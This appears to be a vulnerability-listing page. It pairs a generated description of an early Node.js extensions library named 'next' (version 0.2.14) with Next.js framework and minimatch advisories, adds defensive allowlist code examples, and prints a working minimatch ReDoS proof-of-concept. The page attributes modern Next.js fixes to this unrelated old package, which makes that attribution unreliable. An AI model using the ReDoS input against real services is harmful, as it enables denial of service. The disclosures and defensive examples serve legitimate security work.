Next.js version 0.2.14 represents an incremental update to the Node.js extensions library, building upon the foundation laid by version 0.2.13. For developers, the primary allure of this package lies in its aim to provide useful utilities and extensions that streamline Node.js development. The key differentiators between versions 0.2.13 and 0.2.14 are primarily dependency updates. Version 0.2.14 showcases several dependency upgrades, namely, "es5-ext" moving from version 0.7.x to 0.8.x, "deferred" shifting from 0.4.x to 0.5.x, and "minimatch" evolving from 0.1.x to 0.2.x.
These dependency enhancements are important because they potentially bring performance improvements, bug fixes, and new features from the underlying libraries. Developers relying on these core dependencies should benefit from enhanced stability and up-to-date functionalities. While the "devDependencies" and other core metadata, like the author and repository, remain consistent, the refreshed dependencies signal an effort to maintain a current and robust library, encouraging adoption by developers wanting a reliable base for their Node.js projects. The release date confirms a relatively short period between the two versions, indicating active maintenance and a dedication to keeping the library current with its dependencies.
All vulnerabilities related to version 0.2.14 of the package
Directory Traversal in Next.js
serverless target; next export
We recommend everyone to upgrade regardless of whether you can reproduce the issue or not.
https://github.com/zeit/next.js/releases/tag/v9.3.2
Next.js Race Condition to Cache Poisoning
Summary
We received a responsible disclosure from Allam Rachid (zhero) for a low-severity race-condition vulnerability in Next.js. This issue only affects the Pages Router under certain misconfigurations, causing normal endpoints to serve pageProps data instead of standard HTML.
Credit
Thank you to Allam Rachid (zhero) for the responsible disclosure. This research was rewarded as part of our bug bounty program.
Next.js Content Injection Vulnerability for Image Optimization
A vulnerability in Next.js Image Optimization has been fixed in v15.4.5 and v14.2.31. The issue allowed attacker-controlled external image sources to trigger file downloads with arbitrary content and filenames under specific configurations. This behavior could be abused for phishing or malicious file delivery.
All users relying on images.domains or images.remotePatterns are encouraged to upgrade and verify that external image sources are strictly validated.
More details at Vercel Changelog
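The advisory above asks for external image sources to be strictly validated. The following is an added example, not Next.js's own code: a stand-alone allowlist check for image URLs modelled on the shape of images.remotePatterns entries (protocol, hostname, port, pathname). The matching rules it implements (one label per "*", one or more per "**", "/**" as a path-prefix wildcard, a strict port check) are this example's own simplification and an assumption about the intent of such a configuration, not a description of how Next.js itself matches; the patterns and candidate URLs are constructed.

```javascript
// Added example, not Next.js's own matcher. Weak configuration (any path on
// the host is accepted):
//   images: { domains: ["cdn.example"] }
// Stricter shape, restricting protocol and path prefix as well:
//   images: { remotePatterns: [
//     { protocol: "https", hostname: "*.cdn.example", pathname: "/avatars/**" },
//   ] }
// The functions below check a URL against entries of that shape using this
// example's own (assumed) rules.

// Label-wise hostname match: "*" matches exactly one DNS label, "**" matches
// one or more labels, anything else must match literally (case-insensitive).
function hostMatches(pattern, hostname) {
  return matchLabels(pattern.toLowerCase().split("."), 0, hostname.toLowerCase().split("."), 0);
}

function matchLabels(p, i, h, j) {
  if (i === p.length) return j === h.length;
  if (p[i] === "**") {
    // "**" must consume at least one label; try every possible split.
    for (let k = j + 1; k <= h.length; k++) {
      if (matchLabels(p, i + 1, h, k)) return true;
    }
    return false;
  }
  if (j === h.length) return false;
  if (p[i] !== "*" && p[i] !== h[j]) return false;
  return matchLabels(p, i + 1, h, j + 1);
}

// Path match: a pattern ending in "/**" accepts any path under that prefix;
// any other pattern must match exactly. URL parsing resolves "." and ".."
// segments first, so "/avatars/../uploads/x" is compared as "/uploads/x".
function pathMatches(pattern, pathname) {
  if (pattern === undefined) return true;
  if (pattern.endsWith("/**")) return pathname.startsWith(pattern.slice(0, -2));
  return pathname === pattern;
}

// True only if the URL parses and satisfies at least one pattern on protocol,
// hostname, port (empty string = default port) and pathname.
function isAllowedImageSource(urlString, patterns) {
  let url;
  try {
    url = new URL(urlString);
  } catch {
    return false; // unparsable input is rejected, never "allowed by default"
  }
  const protocol = url.protocol.slice(0, -1); // "https:" -> "https"
  return patterns.some(
    (p) =>
      (p.protocol ?? "https") === protocol &&
      hostMatches(p.hostname, url.hostname) &&
      (p.port ?? "") === url.port &&
      pathMatches(p.pathname, url.pathname),
  );
}

// Constructed patterns and candidate URLs for a stand-alone run.
const ALLOWED = [
  { protocol: "https", hostname: "*.cdn.example", pathname: "/avatars/**" },
];
const CANDIDATES = [
  "https://img.cdn.example/avatars/u1.png",            // allowed
  "http://img.cdn.example/avatars/u1.png",             // wrong protocol
  "https://cdn.example/avatars/u1.png",                // "*" needs one subdomain label
  "https://img.cdn.example/avatars/../uploads/x.png",  // normalises outside the prefix
  "https://img.cdn.example:8443/avatars/u1.png",       // non-default port
];
for (const c of CANDIDATES) console.log(isAllowedImageSource(c, ALLOWED), c);
```

The point of the pathname restriction is that a host allowlist alone still lets any object on that host, including user-uploaded content, be served through the optimizer; a prefix on a trusted asset path narrows that considerably.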
Next.js Improper Middleware Redirect Handling Leads to SSRF
A vulnerability in Next.js Middleware has been fixed in v14.2.32 and v15.4.7. The issue occurred when request headers were directly passed into NextResponse.next(). In self-hosted applications, this could allow Server-Side Request Forgery (SSRF) if certain sensitive headers from the incoming request were reflected back into the response.
All users implementing custom middleware logic in self-hosted environments are strongly encouraged to upgrade and verify correct usage of the next() function.
More details at Vercel Changelog
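The advisory's trigger is passing the whole incoming header set into NextResponse.next(). As an added example (not Next.js project code), the block below shows the defensive shape a reviewer would look for in custom middleware: copy only an explicit allowlist of headers into a fresh Headers object and log whatever was dropped. The allowlist contents, the sample request and the header names in it are assumptions constructed for this example; the commented middleware body is illustrative and NextResponse is deliberately not imported so the file runs stand-alone in Node.

```javascript
// Added example, not Next.js's own code.
// Vulnerable shape described in the advisory (kept here as a comment only):
//   return NextResponse.next({ request: { headers: request.headers } });
// Every header the client sent is carried forward unchanged.

// Headers the application genuinely needs downstream (assumed set; pick the
// minimal list your own handlers actually read).
const FORWARDED_HEADERS = [
  "accept",
  "accept-language",
  "content-type",
  "authorization",
  "x-request-id",
];

// Build a new Headers object containing only allowlisted headers. The
// incoming object is never reused, so nothing outside the list survives.
function forwardSafeHeaders(incoming, allowlist = FORWARDED_HEADERS) {
  const out = new Headers();
  for (const name of allowlist) {
    const value = incoming.get(name);
    if (value !== null) out.set(name, value);
  }
  return out;
}

// Header names present on the request but not forwarded; a useful detection
// signal when clients start sending headers the app never expects.
function droppedHeaders(incoming, allowlist = FORWARDED_HEADERS) {
  const allowed = new Set(allowlist.map((n) => n.toLowerCase()));
  const dropped = [];
  for (const [name] of incoming) {
    if (!allowed.has(name)) dropped.push(name);
  }
  return dropped.sort();
}

// Hardened middleware shape (illustrative, not runnable here):
//   export function middleware(request) {
//     const headers = forwardSafeHeaders(request.headers);
//     const dropped = droppedHeaders(request.headers);
//     if (dropped.length) console.warn("dropped client headers:", dropped);
//     return NextResponse.next({ request: { headers } });
//   }

// Constructed sample request for a stand-alone run.
const sampleIncoming = new Headers({
  accept: "text/html",
  authorization: "Bearer example-token",
  "x-forwarded-host": "spoofed-host.example",   // constructed client-supplied header
  "x-example-internal-hint": "/somewhere-else", // constructed; stands in for any header the app never meant to forward
});

console.log([...forwardSafeHeaders(sampleIncoming)]);
console.log(droppedHeaders(sampleIncoming));
```

Allowlisting rather than denylisting matters here because the set of headers the framework treats as meaningful is not something application code should have to track across upgrades; anything not explicitly needed simply does not get through.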
Regular Expression Denial of Service in minimatch
Affected versions of minimatch are vulnerable to regular expression denial of service attacks when user input is passed into the pattern argument of minimatch(path, pattern).
var minimatch = require("minimatch");
// utility function for generating long strings
var genstr = function (len, chr) {
  var result = "";
  for (var i = 0; i < len; i++) {
    result = result + chr;
  }
  return result;
};
// a user-controlled pattern: a bracket expression followed by a very long run
// of backslashes, which the vulnerable matcher spends catastrophic time on
var exploit = "[!" + genstr(1000000, "\\") + "A";
// minimatch exploit.
console.log("starting minimatch");
minimatch("foo", exploit);
console.log("finishing minimatch");
Update to version 3.0.2 or later.
minimatch ReDoS vulnerability
A vulnerability was found in the minimatch package. This flaw allows a Regular Expression Denial of Service (ReDoS) when calling the braceExpand function with specific arguments, resulting in a Denial of Service.